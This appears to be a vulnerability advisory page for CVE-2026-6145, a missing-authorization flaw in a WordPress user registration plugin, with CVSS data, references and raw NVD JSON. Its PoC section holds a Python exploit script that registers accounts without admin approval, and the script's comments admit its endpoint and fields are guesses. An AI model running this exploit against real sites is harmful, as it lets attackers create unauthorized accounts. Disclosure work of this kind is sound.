Security Vulnerability Report
CVE-2026-6145 (CVSS 5.3, MEDIUM)

Published: 2026-05-14 09:16:26
Last Modified: 2026-05-14 14:28:41

Description

The User Registration & Membership plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 5.1.5. This is due to the is_admin_creation_process() method relying solely on the presence of action=createuser in the $_REQUEST superglobal without performing any authentication or capability check. This makes it possible for unauthenticated attackers to bypass the admin approval requirement when registering new accounts via the fallback submission path.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data available (NVD record status: Deferred).
Affected: User Registration & Membership <= 5.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.

```python
#!/usr/bin/env python3
import requests


def exploit_cve_2026_6145(target_url, username, email):
    """
    PoC for CVE-2026-6145: Missing Authorization in User Registration Plugin.
    This script attempts to register a user without admin approval by
    injecting the 'action=createuser' parameter.
    """
    # The endpoint might vary based on installation, usually
    # /wp-admin/admin-ajax.php or a specific registration endpoint.
    # This assumes a standard registration form endpoint structure for the plugin.
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"
    payload = {
        "action": "createuser",  # The vulnerable parameter that bypasses approval
        "ur_user_login": username,
        "ur_user_email": email,
        # Additional required fields might be needed depending on form configuration
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": target_url,
    }
    try:
        response = requests.post(endpoint, data=payload, headers=headers, verify=False, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent to {endpoint}")
            print(f"[+] Response: {response.text[:200]}")
            print("[+] Check if user was created without approval.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Example usage
    target = "http://example-wordpress-site.com"
    user = "attacker_user"
    mail = "[email protected]"
    exploit_cve_2026_6145(target, user, mail)
```

References

Weakness: CWE-862 (Missing Authorization)
https://plugins.trac.wordpress.org/changeset/3516468/user-registration/trunk/includes/class-ur-user-approval.php (plugin changeset, class-ur-user-approval.php)
https://www.wordfence.com/threat-intel/vulnerabilities/id/b6b349f2-24c9-4921-bb5f-a7726ebc5c2a?source=cve (Wordfence advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-6145",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T09:16:26.290",
    "lastModified": "2026-05-14T14:28:41.283",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The User Registration & Membership plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 5.1.5. This is due to the is_admin_creation_process() method relying solely on the presence of action=createuser in the $_REQUEST superglobal without performing any authentication or capability check. This makes it possible for unauthenticated attackers to bypass the admin approval requirement when registering new accounts via the fallback submission path."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3516468/user-registration/trunk/includes/class-ur-user-approval.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b6b349f2-24c9-4921-bb5f-a7726ebc5c2a?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```